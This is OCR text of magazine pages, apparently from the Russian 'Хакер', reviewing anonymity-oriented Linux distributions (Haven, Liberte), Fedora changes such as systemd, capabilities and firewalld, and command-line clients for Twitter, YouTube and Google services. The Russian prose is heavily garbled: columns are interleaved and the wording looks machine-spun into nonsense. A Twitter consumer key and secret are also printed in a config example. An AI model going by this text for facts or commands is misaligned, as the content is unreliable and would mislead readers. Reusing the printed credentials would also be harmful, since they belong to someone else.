трибутивом Наvеп, но его цейхгауз ими не ограничивается. Здесь твоя милость найдешь бонус в виде пяти дополнительных полезных рас­

ширений: RefCoпtгol- производит спуфинг НТТР­ поля НТТР-геfеггег, скрывая отсайтов их

доноры, в таком случае вкушать сайты, от которых произошел

Congratulations. You are using Tor.

переход.

CookieSafe- позволяет заправлять уста­ новкой кукисов на браузер интересах выбранных

Please refer to the Тог webs~e for

сайтов .

AdBiock Рlus-блокируетрекламу. RequestPolicy- позволяет обнаруживать меж­

сайтовые требования равным образом ворочать ими [защита от CSRF-aтaкl. Peгspectives- позволяет проверять подлинность самоподписанных

SSL-

сертификатов.

Libeгte: Тог да ни ложки вдобавок

Некоторые дистрибутивы вдобавок включают на себя мировой аппарат Аiгсгасk-пg

местонахождение точки получи экране. Все приложения

пользу кого исследования Wi-Fi-ceтeй равно генераторы

собраны от использованием инструментария

паролей, устойчивых для подбору [например,

Haгdened Geпtoo , предназначенного на сборки

хитры х методов про защиты личны х данных .

PWGeп во Tailsl. Для безопасной переписки не без; по­

проекта. Этот инструментарий содержит та ко ие

Водан изо них- сие бл ок ировка экрана не без; помо­

мощью

патчи, в качестве кого SSP [защита с переполнен да моя персона из тека

щью у тилиты slock [ too l s.suck l ess.oгg/s l ock l.

да буфера! равно ASLR [рандомизация распределе­ ния памяти!.

Чтобы грабитель безграмотный туман перегнать блокира-

X-chat

используется рост

GPA

[GNU Pгivacy Assistaпt: gpa .wald . intevat i on.oгg l, а плагин SASL [ ygгek.oгg.ua/p/cap sasl.htmll обеспечивает анонимную переписку при помощи Тог. В арсенале Libeгte Liпux как и в наличии менед­

далеко не со х раняется!. В L i beгte Liпu x вдобавок снедать малость

Но одной блокировки шелковица самоочевидно скудно . тор со п что касается мощью комбинации

ДРУГИЕ ИНТЕРЕСНОСТИ

<Ait + Fx>,

возлюбленная

запрещена на настройках сервера. На миг

жер управления жете ролями Figaгo's Passwoгd

В этом разделе мы хотел бы загнать о во всех отношениях

лока вот и все отключаются системные Linuх­

Manageг 0 [ l s . гegпet . cz/fpm2 /l , который-нибудь шифрует

интересном равным образом полезном, сколько безвыгодный вошло на пред­

комбинации

постоянно сохраненные пользователем парали вместе с помо­

ыдущие разделы. В основном сие отличаются как небо и земля

однако хлопнуть Х-сервер alias перезагрузить машину.

щью алгоритма

трюки да нетрудно занимательные решения,

Вторая карта Libeгte- зто приближенно называемый

использованные разработчиками дистрибути­

«безопасный браузер>>, который-нибудь использует­

заключается на наличии экранной клавиатуры

вов. Одна изо интересных особенностей На v еп

ся с целью регистрации на точках доступа . Браузер

[Fioгence: f l oгeпce . sf.net l, которая использу­

заключается на том, который спирт никак не настраивает интернет

работает подина управлением выделенного

ется на обхода кейлогерров, внедренных

автоматически. Предполагается, аюшки? когда

пользователя, имеющего минимальные компетенция

во основа alias во какие-либо библиотеки времени

пользователю обмет невыгодный нужна, так вернее полно­

доступа, а вдобавок имеет собственные мировоззрение

AES-256 . Интересная

особен­

ность приблизительно всех безопасных дистрибутивов

SysRq,

со через которых мож­

исполнения . Фишка тутовник на том, что, во крест

стью уберечь его ото всех возможных проблем.

во iptaЫes, разрешающие коннекты токмо

ото хардварной клавиатуры, нажатия клавиш

После того на правах ламер убедится во рабо­

держи определенные брюки веб-регистрации.

которой поймать не задавайся простого, экран­

тоспособности демона Тог, индигенат которого ука­

ная мануал управляется мышью, которую

зывает знак во трее, спирт сможет самостоятель­

бесплодно перехватывать- получишь всего-навсего

а включить обмет [то бишь NetwoгkManageгl

кого диска равным образом памяти нет слов срок установки другими словами

со через разблюдник Applicatioпs

завершения работы. Например, устройство,

Вторая занятная штука в -

V1daL 0a Contro l Panel

status Connected to the Tor network! Vidalia Shortcuts

•••

@яорТоr View the Network ""- вandwidth Graph

l@ Message Log

Setup Relaying

~ Use а New ldentity

~ Help

(t About

Settings

f3 Exit

-7

Staгt Netwoгk .

Haven- зто

нали-

Графический инструментуправпения

ХАКЕР

03/158/ 001 0

Hide

Tor

получи и распишись которое происходит установка, всецело

чие до конца работоспособного комплекса

зачищается хорошенько забивки области памяти

Тог Ьгоwsег bundle [преднастроенная версия Fiгefox равно демона Тог! в целях Windows. Ты на лю-

интересах того, с целью снять остатки предыдущей

схватка миг можешь перевести его во приблизительно

установки иначе говоря на веки вечные сдавить конфиденци­

называемый обманчивый раздел флешки [про него читай изумительный врезке! вместе с через одного клика мышью [Application -7 Наvеп -7 Сору Windows

альные способности . Для защиты с атак подобно

Toolsl, послать флешку другу, равным образом некто также станет анонимусом. Haven несомненно назначить получи и распишись другую

памяти сохраняется единаче изрядно секунд/

флешку от через встроенного инсталлятора.

выключением.

нулями другими словами случайными данными. Это нужно

Cold boot, возможных вследствие тому, что такое? после выключения комок жете уведомление на оперативной минут, воспоминания тотально затирается на пороге

Просто воткни брелочек во либерал USВ-порт, выбери во разблюдник параграф

Applications -7 Haven -7

ВМЕСТО ЗАКЛЮЧЕНИЯ

Наvеп lnstalleг, равно дистрибутив скопируется

Собственно, держи этом позволяется равным образом закончить. Мы

для флешку. Естественно, сверх твоих личных

рассмотрели относительная технологий, ис­

настроек да данных. Кстати, согласно дефолту

"1 Show this window on startup

Большинство безопасных дистрибутивов используют небольшую толику методов зачистки жест­

Haven

пользуемых во дистрибутивах на анонимусов .

подключает по сию пору съемные носители во режиме

Теперь тебе решать- назначить какой-либо

<<только чтение>>, ась? позволяет ничтожно

с описанных на статье дистрибутивов сиречь при­

просматривать чужие файлы [время доступа

менить отдельные методики нате своем компе. ::х::

007


UNIXOID

Ма ксим «hatc het» nолево й

[maks.ha tchetlaya ndex.rul .

МИНИ-ОБЗОР ЗАСЛУЖИВАЮЩИХ

ВНИМАНИЯ ИЗМЕНЕНИЙ В ПОСЛЕДНИХ ВЕРСИЯХ

FEDORA

П по части вместе с ледние верс ии д да стр да бут равно ва Fedo г a выделяютс я неск в рассуждении л ь кими да нтересными равным образом ну да ж е равным образом н н ова ци онным равно

направление е н е ни ям равным образом . Fedoгa

Syste md,

на Fedoгa

04 переш л а бери со да стему равным образом н равно циал равно зации 15 SETUID-б ит на приложениях з амен е н

т ехнолог равно е й CapaЬil i t i es , во шес тн адцато м рел да зе о будучи вместе с твлен претворение для загрузчик

HAL.

GRUB2

да убрана построение

Разработчики в свою очередь приняли решен равным образом е на будуще м

пере из мотр е ть струк т уру катало г ов, которая почти что безвыгодный менялась

со времен

UNIX. Ра бочи й княжение

a..W.il!l$1•1

В конце концов долготерпение разработчиков

С т андартная со равным образом от положение ини ц иализации

лопну л что касается , равно они создали систему инициализа ­

накануне вместе с тавшаяся «пингвину » во

ции

SysV, наследство через UNIX,

Systemd, которая

решила безвыездно проблемы

Fedora держи основе Gnome 0

-и всё, общественный порядок во опаснос т да . А всё потому, что-то

piпg имеет S E TUID - бит, наделяющий его права­ ми гооt , которые нужны токмо д ля того , чт в рассуждении бы

завсегда обладала недостатком, порожденным

дружно . Она стала проверять последова­

созидать сырые IRAWI со кеты . И безграмотный имеет принципиальное значение , зачем

ее а простотой . Она позволяла засовывать

тельность запуска сервисов равным образом равно х проведение

piпg всеми средствами пытается сдержать

коллекция системных сервисов умереть и отнюдь не встать промежуток времени загрузки

равным образом даже если позволила послать ко всем чертям через громоздких

миг использования повышенных прав, ве­

равным образом доделывать их кайфовый эпоха шатдауна, хотя невыгодный имела

скриптов, предоставив встроенные собственность

роятно из ть ошибки- коленце непредсказуемая ,

никакихсредств д ля а д еква т да г оконтроля

для того подготовки сервисов для запуску. При этом

тем сильнее ась? гибельность слабит далеко не токмо piпg,

их исполнения. В результате разработчикам

первых двух целей хуй алось добиться цельный -

же да

прихо д илось равным образом д ти получи различ н ые ухищрения ,

ма ори г иналь н ым равным образом по отношению д новременно п ростым

сложных равным образом жадных перед гооt- п рав. Как сбавить

ч тобы взять в рассуждение в дальнейшем д овател ь паяльник т ь вслед за п уска

из п особом, а име нн что касается п у т ем заб л аго во реме нн насчёт г касательно

риски на этой ситуа ц ии? Ис п касательно л ьзоват ь S EL iпux?

сих самых сервисов , в рассуждении пт имизировать заг р узку

соз д а н ия файл-сокета се р виса.

Слишком толсто, особенно вместе с уче т ом т относительно г о, ч т в отношении

ОС равно контролирова т ь ис п в рассуждении лн е н ие демонов,

Systemd

кайфовый ш ла во F edoгa

04

во качес т ве

ftp

равно купа других софтин, куда как побольше

многие пользователи безвыгодный понимают да имеют

которые имеют афинность п ерио д ически п адать

опции, однако сейчас ко сле д ующему релизу превра т и­

привычку отключать его. П озволить софтина м,

из- з а никак не х ватки ресурсов, ОоS-атак равным образом ошибок

лась на ста нд ар т ную систему запуска/контроля

далеко не имеющим прав гооt, организовывать RАW-сокеты

на коде . Появилась разрозне н ная ахан сложных

сервисов. Е е подина д ержка была снова чище рас­

равным образом привилегированные порты? Е ще большая

ширена во Fedoгa 06lбыли переписаны мно г ие устаревшие скрипты инициализации!.

брешь во безопасности . Ах безусловно , у нас а принимать шту­

скриптое инициализации, при случае вызываю­

щишки х множе со тво подсобных утилит видать

gгер ,

awk

cut,

да им подобных. Она беда усилий ру­

шилась близ малейшей модификации. В общем,

ковина почти названием Что такое

CAPABILIТIES

VS SETUID

Capabilities! Capabil ities? Это доктрина

деле­

гирования повышенных прав «по кусочкам » ,

неприметность породила экстремальность , которая из года­

Ис п олняемые файлы не без; SЕ Т UIО-битом- гонитель

своего рода своего рода

ми всё свыше росла равно мешала .

всех н иксов. Н ай д ут на каком-нибудь piпg д ыру

ко, тяжба отнюдь не полными, а дни т равно ч ными карт-бланш ми

008

SETUID,

держи д еляющий , одна­

ХАКЕР

03/158/20 02


Федорина благоденствие

гооt, например, позволяющий образовывать RАW­

fedora

0

сокеты либо — либо вычислять привязку ко приви­

легированным портам. Благодаря CapaЬilities,

ping'y не возбраняется передать компетенция только лишь получи создание в нем дыру, дьявол безграмотный получит ничего, исключая

.. . да,

власть в работа RАW-сокетов. Какая досада, не так оно и есть ли?· Первоначально машина CapaЬilities поя­ вился в таком случае ли в включен во

HP-UX, ведь ли во AIX. Он уж давно стандарт POSIX, за всем тем насчёт нем последняя стержень в колеснице

:::::.=--:::5:::

""'" ............

~-·

RАW-сокетов, равным образом пусть даже коли громила найдет

·-=::

.. ... ,.-.

!М()

дост,..._rt••••••• мllwn-

w•

~· ·--·· ,~~

___...,_

ит,.ас •

....~

· -~· ··­ .................. _ .....

относительно ,

~~о~Мо~~. ,

·:::::;:; О0_ 3-• •м·-~-·-•н _ ,..,... [) ( мм••...,.._,.,,...-

____,_. _ --------·

:-

....

файловой системы во ядре

Linux 0.6.24.

КАТАЛОГОВАЯ СТРУКТУРА

-

. ..._ ,

невыгодный вспоминал, нонче малограмотный появилась шанс

править привилегиями от через атрибутов

0

Fedora получай

• ам"

Графический сбруя уnравления Systemd

Установка

разделов или, что такое? до сейте поры круче, Ыгf-снапшотов.

ко твердотельным накопителям !запись во ФС всегда производится во режиме

К сожалению, многие старые пердуны ,

Еще одна интересная идея, предложенная

btгfs

COW- копиро­

интересах реализации во следующих версиях Fedoгa,

привыкшие для миру равно сnокойствию да радею­

вание nри записи!, а вдобавок имеет встроенную

заключается во реорганизации каталоговой

щие вслед за выполнение традиций, выеказались

поддержку онлайн-снапшотов, ась? позволяет

структуры, приблизительно невыгодный менявшейся со времен

наперекор этой идеи, подкрепив домашние сотрясение воздуха тем,

во все так же какой минута основать стереопроекция текущего

UNIX. Эта

что, дескать, снедать образчик

состояния ФС равным образом откатить ее для предыдущему со­

мысль состоит на том, дабы пере­

LSB

равно в чем дело? придет­

местить всегда исполняемые файлы на /usг/Ьin, отказавшись, таким образом, через каталогов /Ьin, /sЬin, /usг/sЬin, а вдобавок ото каталога /lib, всё со­

ся заключать соглашение из разработчиками софта

стоянию. В Fedoгa

да другими дистрибутивостроителями, оттого

бригадир

виды реализации описанной идеи сей поры

ным подходом ко формированию карточка загрузки

держимое которого планируется nеренести на

до этот поры туманны.

IGRUB самолично находитустановленные ОС/ядра

GRUB2,

06

произошел форсирование в за­

отличающийся интеллектуаль­

равно добавляет их во список!, содействующий

/usг/lib . Нововведение сие безграмотный лишь только да безвыгодный столь­ ко косметическое, какое количество серьёзно практиче­

ДРУГИЕ ИНТЕРЕСНЫЕ ИЗМЕНЕНИЯ

UNICODE

ское. Дело на том, что, до мнению разработчиков

В 05-ю версию Fedoгa был добавлен трясавица

ческим интерфейсом. Из системы в свою очередь была

дистрибутива, /Ьin, /sЬin равным образом /lib поуже исстари по­

fiгewalld, позволяющий менять взгляды на жизнь па­

тотально удалена пласт

теряли частный значение равно как каталоги интересах хранения

кетного фильтра держи лету, безо перезагрузки всех

Abstгaction Layeгl, заместо которой в настоящий момент ис­

базовой системы, которая может бытовать загруже­

правил равным образом разрыва сетевых соединений. Так

пользуется

на, ажно буде каталога /usг недостает нате месте lв ста­

по образу к управления демоном служит документ

предназначенными к управления дисковыми

рые эра его было повелось подсоединять

из через NFSI. В так а миг перемещение всех системных файлов на /usг позволит сотворить

0-BUS,

им может ухватиться что бог на душу положит при­

равным образом обладающий полноценным графи­

udev гурьбой

вместе с

HAL IHaгdwaгe

udisks

да upoweг,

накопителями lв часть числе равным образом на выполнения

ложение не без; соответствующими полномочиями.

автомонтированияl равным образом контроля питания. За вычисление

Для уnравления демоном с командной строки

удаления

предусмотрена обслуживающая программа fiгewall-cmd, со по­

ки системы равно ее реагирования получай включение

трюки, как, например, нагрузка разных версий

мощью которой дозволительно сидеть вместе с правилам и,

внешних устройств.

системы от через монтирования разных /usг-

отталкиваясь с имен служб, а безграмотный IР-адресов

сильнее гибкую систему, в надежде делать такие

HAL посчастливилось

прогнать сезон загруз­

Fedoгa 06теперьсодержитвкомплектеути­ литу viгt-sandbox, nредназначенную чтобы заnу­

да номеров портов:

ска приложений во изолированном окружении .

#define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define

0 CAP_DAC_OVERRIDE 1 CAP_DAC_READ_SEARCH 0 САР _FШ.JNER 3 CAP_FSETID 4 CAP_KILL 5 САР _SETGID Б САР _SETUID 7 CAP_SETPCAP 8 CAP_LINUX_IMMUTABLE 0 CAP_NET_BIND_SERVICE 00 CAP_NET_BROADCAST 11 CAP_NET_ADMIN 12 CAP_NET_RA~ 13 CAP_IPC_LOCK 14 CAP_IPC_O~NER 15 CAP_SYS_MODULE 15 САР _SYS_RAIOO 17 CAP_SYS_CHROOT 18 CAP_SYS_PTRACE 19 CAP_SYS_PACCT 20 CAP_SYS_ADMIN 21 CAP_SYS_BOOT 22 CAP_SYS_NICE 23 САР _CHШ.JN

Сnисок

Capabllities ядра Linux

ХАКЕР

03/158/2012

$ firewall-cmd $ firewall-cmd

В разница с

--service=ssh --еnаЫе \ --service=samba --timeout=18 $ firewall-cmd --disaЫe \ --service=ipp-client --еnаЫе

selinux-sandbox,

новая обслуживающая программа

может утилизировать ради формирования <<nе ­ сочницы» любую технологию, поддерживаемую

библиотекой libviгt, возьмем контейнеры

LXC

тож виртуальную машину QEMU/ViгtuaiBox. Дистрибутив днесь поддерживаеттех­

В комплекте из пирушка но Fedoгa пределенная файловая

05 по рукам рас­ система CloudFS, пред­

ставляющая из себя расширенную редакцию

нологию безопасной загрузки Tгusted

Boot,

гарантирующую непрерывность ядра да си­

стемных компонентов вот сезон загрузки ОС

виртуальной ФС GlusteгFS, которая nредназна­

и, таким образом, предохраняющую систему

чена на развертывания распределенных фай­

через различных руткитов да другого вредоносного

ловых систем.

CloudFS

работает во пространстве

пользователя, потому-то может бытийствовать несомненно

ПО, внедряемого самотеком во суть ОС. Для реализации технологии на систему был до­

установлена во других Linuх-дистрибутивах для того

бавлен специально предназначенный модуль, вызываемый до этого времени

создания гетерогенного кластера.

накануне загрузки ядра, при всем том спирт бесполезен безо

В Fedoгa

05 равным образом

изменилась проект име­

нования сетевых интерфейсов, которая об эту пору

соответствующей аппаратной поддержки . Также реализована построение проброса

выглядит следующим образом: встроенным

USВ-устройств бери удаленные машины, которая

на материнскую плату llelmbedded lmlotheгboaгdl

позволяет обесnечить, например, путь ко wеЬ­

сетевым адаптерам присваиваются имена

камере не без; второй машины. Система работает

em1, em2

равно т. д., о ту пору на правах платы, подключаемые

из помощью где

emO,

PCI,

0- факс

получают имена вида

РС I -слота, а

pci1#2,

0- сеточный

порт.

для основе интегрированного на Fedoгa токола удаленного доступа ной механизмы

QEMU.

Spice

04 про­

равным образом виртуаль­

П роброс nроисходит во неудовлетворительно

Начиная от 05-й версии, Fedoгa дозволительно устано­

этапа : сперва возьми виртуальную машину, а после

крутить получи файловую систему Ыгfs средствами

в удаленную, идеже осуществляется исподняя

штатного инсталлятора. Btгfs отличается высо­

nроцедура проброса устройств получай реальную

каковой производительностью равно дружелюбностью

машину. :::к:

009


UNIXOID

Евгеньюшка Зобнин

вплоть до небес

lzobniniOgmail.coml

АТЬ ИНТЕГРИРУЕМ LINUX И <<ОБЛАЧНЫЕ>> СЕРВИСЫ

Все автор медленно, хотя по-видимому переходим для работе кайфовый Всемирной паутине, забывая

привычные настольные приложения. Современный общество немыслим сверх

YouTube, GDocs

Gmail,

да огромного количества веб-сервисов, заменяющих нам обычные

программы . Но в такой мере ли нужен веб-браузер, чтоб наслаждаться «облачными» приложениями?

накануне <<облако на >> с командной строки равно nре­ дол ж получай

вратим файловую систему во приспособление пользу кого

ыть операционная сис т ема,

всецело следовать вязанная бери << обла ч ные » подле ­

работы со <<об лаками >>.

ложения ? Такой, на правах ОС-браузер, пример

Google

Chгome

пре из л по части вутый

05? Или, может быть, такой, Plan9, невыгодный делающий различий

наравне

К Л И Е Н ТЫ << ОБЛАЧ НЫ Х» СЕРВ И СОВ С веб-сервисами далеко не всякий раз складно трудиться

в обществе л ока льными равным образом сетевыми ресурсами?

с окна веб-бра узера. Тот но Twitteг, напри­

Нет, быстрее всего, симпатия хорош nредставпять

мер, сверху широком экране занимает самое многое

с лица неизвестно что вместе с реднее в ряду ними, ведь кушать опе­

nолстраницы, а дергать интервал Твиттера

рационку, позволяющую <<хо дить на

с браузера, nодгонять размер сего окна

.. облака">>

равным образом тем да др угим не без; соответственно собом.

Подви жки на создании подобной ОС нача­

равным образом топтать после тем, воеже по стечению обстоятельств его безграмотный за­ крыть, продолжительно равным образом н еудобно. К тому но обшивка

лись поуже века . Те а стандартные окружения

навигации хорошенького понемножку меш ть . Гора здо то ли дело

рабочего не без; тола на Liпux еще для у чили вместе с ь син­

nосадить Т виттер во трей, в надежде что до н nоказы­

х ронизировать документация пользователя от <<об лач­

торсион новые сведения во виде всплывающих

НЫМ >> х ранилищем

IUbuntu One], проигрывать видеозаписи с YouTube на окне стандартного медиапроигрывателя ITotem, наnример, умеет

подсказок. Как сие сделать? Да легко

зто сейчас изрядно лет] , судить информацию

к Liпu x убирать сгенерированный энтузиастами

вместе с веб-страниц нате оперативный питание lвиджеты КОЕ и Google Gadgets] равным образом пускать в ход избыток

клиент. Среди Тwittег-к лиент ов наибольшей

др у ги х способов интеграции из веб-сервисами.

рый, п омимо Твиттера , поддерживает единаче

В э праздник ста тье ваш покорный слуга расскажу, для ак пока что сильнее

да

поднять мера соnрикосновения веба

Fг ie ndFeed равно

равным образом обычного Linu х-десктопа . Мы рас смо трим

сказать, получи любит еля, что-то около наравне оно ахти тя­

уймища приложений для того данник ото ы от <<об­

желовесное да зависит через различных Gпоmе­

лачными >> сервисам равным образом , попробуем дост учат ься

библиотек. Поэтому ценителям аскетизма

010

употребить одним изо Тwittег-клиентов .

Почти на каждого п относительно п улярного ве б-сер виса

nоnулярно со тью nользуется Gwibbeг, кото­

ldenti.ca, StatusNet, Fa cebook, Fl ickг, Digg, Qaiku. Прило жение это, приходится

Tyrs- крайне воздержанный Тwittег-клиент для того

рента

ХАКЕР

03 / 058/201 0


Дос тучаться впредь до небе не без;

.

• • • • • • • • • • • t3 НО.аt~ IКIIIДKI ~ ;:, ·' "' 0.-' В. ~ ~ · & ~+Т 'a.:J

• Устройс:тва.Аrd'оld • ctrome Sjnc • Почтовые кпиенты,

art+N Н0.0. 01\ОЮ 0 !МЖ - -оnмто

\

~

Microsolt OU1Iook

• КtМентыча.та,~GО<9!ТаkИ1111АIМ

Shit+Ctf1+N )

~дкм

Чтобы восnоJЪзова.ТhСЯ ЗТWr.1И f1МГ1С!Ж~. сначаланеобхоДимо сrенермровать nаролм nрмо•ен11i . после их

B~IIT~~o Копмроеа~ естнмn. 0

~ авест м е соответ~ ГIOJ1A rtJWI()Жei-МA взамен своеrо oбыLiiOI'O napotiR. дпя каждоrо 0'1Мf'10ЖеtМЯ нужно генерировать частный naporь . ~

PI~ T et!C TI

О nосмотриrе RИдео относительно narюnяx mиnoжetмii! !;iсохр- т~о ст~ttМцукак ...

0

Ctrf+S

l::tайтм .. .

QЬ [}e'I8T8 .. .

Рее~

ctrt+P

введите название, с тем невыгодный :sа.бьnъ. ко какому 01рИfЮ1КеtИ0 относится naporь:

имя: !gcx9e-docs

J::tc:Topltll

Д14Смтчер аад~

st.ift+EIC.-

~ <NмсТМП. д- npoc !OOTpo8 ... Соо6щмn. что до

ш аг lмs 0. Со3Д8.Ате новыill парель nрмложенмя

C! ri+F

Shift+Ctrf+Deletl

(JI06ne-...

ЗWруакм

"- n....пpw > * о'~

tsодмровка \lk>coд...W адрес от тр~-.1

ctri+ U

Гlросмотреn. фоноll~ CTPIIИ..IW (lS)

QJ tnJ!aeк• Shift+Ctt1+J :;; .с=.'"' ..,. -.----

ИНс: Тр)'М~ ТW p 01p86oT- I

Shift + Ctfi +l

Кoиi;~}W&S<npl

0 соsдатъ rщюгь

~~~Android" "Gm8illнauoeи•Pflone•

'GOO{Ielllll(

"o..ctook-~ю.n.ю1ep·, ·т~

CМIЩ)OНI'IIмtMII С М118')'МТ ОМ toЬnine9m8il .com nаролм ~ипо~

помета соtдаtмЯ

Дата nосnедн«о мсnолЬ2оваtМА

ctrome

OL12.20U OL12.20U

01.12.2011 02.12.2011

~~

еа·mаМ

a/O"oid

09.01.2012

09.01.2012

~1

~]

Создаем движение амплуа чтобы нawero Gооglе-приложения

Во т та ко , л е rким дв иже н равным образом е м рук да , приятно й от айт м по отношению ж да превра ти ть на десктоп н ое п р да постель ни е

пишущий эти строки бы порекомендовал вглядеться во сторону

интересных клиентов, как бы графических, беспричинно

ровалея возьми них по вине п опу л ярности , а безграмотный лич­

Рiпо иначе

равным образом консольных. П ользователи среды Gпome

н ы х прист р мастак т ий), т об з д сделал ь мож н об выд е покрапывать

на любом дистрибутиве, где-то ч т что касается найти их

получают единовластно с таких клиентов во комплекте

изрядно инте р нашел ны х подле л оже н ий. В о­

равным образом узнать на своем опыте на деле отнюдь не составит труда. Осо­

со плеером

бого внимания и заслуживает

но целей могут пускать в дело плеер

Hotot.

И оный равно прочий доступны

TweetDeck

Totem.

Пользователи КОЕ4 про тех

minitube,

первых, сие множест на по отношению самых разнообразных «уведомляло к» с целью

Gmail, лучшими изо ко­ CheckGmail равно Gmail Notifieг.

-стильный Тwittег-клиент, какой больше всего

позволяющий просматривать, высматривать видео

торых являются

ценят пользователи маков. Одна беда- некто

равно со из тавлять плей-листы. Программа невыгодный за­

Обе выполняют одну простую вслед за д ачу - сидят

требует

висит через библиотек КОЕ, того подойдет

во трее да выво дя т сведения п р равно п олуче н ии

Adobe AIR,

почто неприемлемо интересах

многих юниксоидов. Поклонники I М-клиента

тоже приверженцам побольше экзотических

переписка . П по части клику происхо д ит п ерехо д н а сайт

P i dgiп должны хоть умри сосредоточить внима­

графических сред. Особого внимания за­

Gmail . Аналогичная

ние в Тwittег-плагин с целью своего фаворита

сл у живает консольный скрипт y outube-vieweг,

называется kdeplasma-gmailпotifieг. Она,

[ спирт в такой мере равным образом называется- pidgiп-twitteг) . Это

позволяющий сыскивать равно просматривать видео

на предпочтение через двух упомянутых вас ш е насчет г рам ­

хоть паче сподручный равно блестящий вариант, не­

из через штатного МРiауег.

мок, может висе т ь малограмотный исключительно на трее [а точнее,

жели полноценное добавление : всё во одном

Просто запусти youtube-vieweг, введи

хренотень чтобы К ОЕ 0

нате панели), же равно для рабочем сто л е равным образом вообще где угодно, куд а К ОЕ п вал во в рассуждении л яет засу н у т ь

месте равно никаких лишних окон. П оклонники

искательский запрос, да в экране появит-

рента как и безграмотный останутся вне вкусного.

ся пронумерованный меню с двадцати

плазмоид. Также очищать полноценные клие н твоя милость

В репазитариях дистрибутивов предостаточ­

первы х совпадений . После ввода постоялый двор

чтобы работы от почему на ой службой. Из сугубо

только Тwittег-клиентов со интерфейсом команд­

н у жн что касается го ролика дьявол сразу же начнет

интересных ваш покорный слуга бы отметил консольный

утнапиштим строки иначе говоря пcuгses. Вотан изо самых

пр по отношению игрываться на полноэкранном режиме.

только в чем дело? не вполне копирующий интерфейс

простых равным образом удобных написал по всем статьям прославленный

С крипт допускается воспользоваться с целью получения

легендарного п очтового клие нт а

Linuх-разработчик Gгeg Kгoah-Haгtman . Этот

списка самых популярных роликов из-за праздник

sup,

Mutt.

Среди утили т команд н ой строки мож н что до вы­

контрагент называется Ыi равным образом может бытовать исполь­

[флаг'-!'), списка самых популярных роликов

зован , например, так:

из-за на вместе с ё времена ['-а ' ), поиска плей-листов ['-р')

водит слово/фразу/предложение для перечисленный

равным образом фильмов ['-М ' ) . Для указания предпо­

язык, равно cliweatheг, печатающий текущую

чтительного качества видео предусмотре-

погоду интересах указанного места земного шара.

ны флаги

'-2', · - з · . '-4', '-7', ·-1· [240р, 060р, 480р, 020р да 0О ВОр соответственно). Также

Оба куда просты во использовании равно равным образом д еа л ьно

маленькое чудо. придется поизвращаться

вместе с через флага '-sub;гu' позволяется пере­

твоя милость или, например, соз д анияу на е д ом л е н ий

от ОАuth-аутентификацией, которую исполь­

ключить МРiауег нате контрафакция русских

из через

зует Твиттер. Для основы на разделе разра­

не без; у бтитров. Чтобы скрипт выводил свыше

ботчика приложений Т виттера

результатов поиска

$ echo

"Му

current uptime is 'uptime'"

0

bti

Однако, чтоб заварить кашу пустить в дело сие

[tw itter.com/

apps/пew ) надлежит выудить Coпsumeг Кеу и Consumeг Secгet равно внести их во конфиг Ыi:

флажок

'-m '. Скрипт

членить скрипт t г aпslatoг, что п росто пере­

подходят с целью интеграции на неодинаковые скри п ­

notify-send:

[50 на смену 00) , используй

$ notify-send

youtube- v iewe г может заделаться

'cliweather

П огода

\

И НД ЕКС -Г О РОДА'

настоящим открытием для того любителей смо­ треть коньки не без;

YouTube.

Найти равно засунуть

Команду мож н относительно п р описат ь во скри n те

$ vi -/.bti

видео от его через позволено после считанные

да навесить в г орячую клави ш у или — или на клю­

# Consumer key

сек у нды , а МРiауег обеспечивает несравненно

чить во следовать д ание

consumer_key;cZy8DdioswAfuЗLJYgбE2w

больше высокое полет картинки. Скрипт

истощить безраздельно с множес т ва апплетов в целях

# Consumer secret

особенн в рассуждении вредительство у ален быть просмотре НО-видео,

отображения пого д ы на трее).

consumer_secret;fniGGUeT12mMWKjmThUdSeKN 32NLWfmnwapwubVQ

из которым f l аsh-проигрыватель справляется

cron [хотя, конечно, тройка обнее

Нельзя оставит ь без участия внимания равным образом подбор ути-

плохо, а МРiауег гоняет его минуя какой-либо значительной нагрузки получай процессор. Стоит

Далее годится не заботиться Ыi. Он напеча­

отметить, что-то самоё поспешность загрузки видео

тает получи экране ячейка страницы, бери которой

да повышается [это испытано экспери ­

твоя милость вместе с можешь нажить

ментальным п у тем , да со нежели связано , неяс­

PIN.

Его надобно

подсоединить на отповедь Ьti, со временем в чем дело? получай морда будут

но). В качестве альтернативы youtube- v ieweг

выведены access_tokeп_key равно access_tokeп_

не грех истощить

secгet, которые безошибочно круглым счетом а придется до­

митивный nсuгsеs-интерфейс не без; vi- п относительно д обным

бавить во конфиг. Далее Ыi полагается заработать,

управлением . Однако некто имеет чудовищный

videotop,

имеющий при­

да со его через не запрещается хорош заниматься

недостаток: требует полной загрузки видео

сведения торчмя изо командной строки.

вплоть до азбука просмотра . Что касается других

Для

серви от ов поискового гиганта [я сконцентри-

YouTube

ХАКЕР

опять же существует серия

03/158/20 02

УСТАНОВКА GOOGLE FS В UBUNTU

DOCS

$ sudo add-apt-repository ppa :doct ormo/ppa $ sudo apt -get update $ sudo apt- get instal l googl e-docs- f s

011


UNIXOID лит лещадь названием GDataCopieг, предназначен­

Google Docs. Пакет включает в себя отлично простых утилит : gls к просмотра списка документов, gcp ради копирования впредь до ­

веб-приложений во отдельных независимых ·

$ google calendar add \

ный пользу кого работы со

'День,

рано или поздно почва остановилась'

браузера .

0.

Добавление контакта:

Когда-то

$ google contacts add \

gmv

запустила гордый

rn.

0.Ql•l <! abs ~~ rol, позво­

ляющий обратить веб-сайт во стандартное

'Евгений

про удаления да перемещения документов со­

ответственно. Пользоваться во всем сим добром просто да угодно . Например, для того просмотра

Mozilla

редакция Pгism 01:1.

кументов со локальной аппаратура равно в нее, gmkdiг для создания каталогов равно утилиты gгm равным образом

окнах, лишенных элементов управления веб ­

десктопное употребление со своим ярлыком,

процессом управления да прочим равно атрибутами

0.

Редактированиедокумента

Google Docs

до этого времени х документов с папки «Работа» делаем

[вдефолтном редакторе, прозвание которого

эдак :

замечено во переменной окружения EDITORI:

обычной программы . Тогда многие адепты компании заявили , зачем вскакивание подобного проекта- сие деяние ко светлому будущему <<о б­ лачного >> десктопа, на котором относительная

$ gls

$ google docs edit --title \

Для их экспорта во формате

PDF

столе да з ап уск ать минус использования веб­

получи и распишись локаль ­

0.

н у ю машину- так:

Добавлени е н ово г насчёт альбома на

Picasa [и за­

ливка фотография к!:

создания кас т ом ны х браузеров равным образом из вязанны х

userпame@gmail .com: / docs / Paбoтa /*

$ google picasa create --title \ "Мои фотки" -/photos/*.jpg

/ tmp/

Для созда ния каталога- так: П убликация видео бери

YouTube:

\. ....

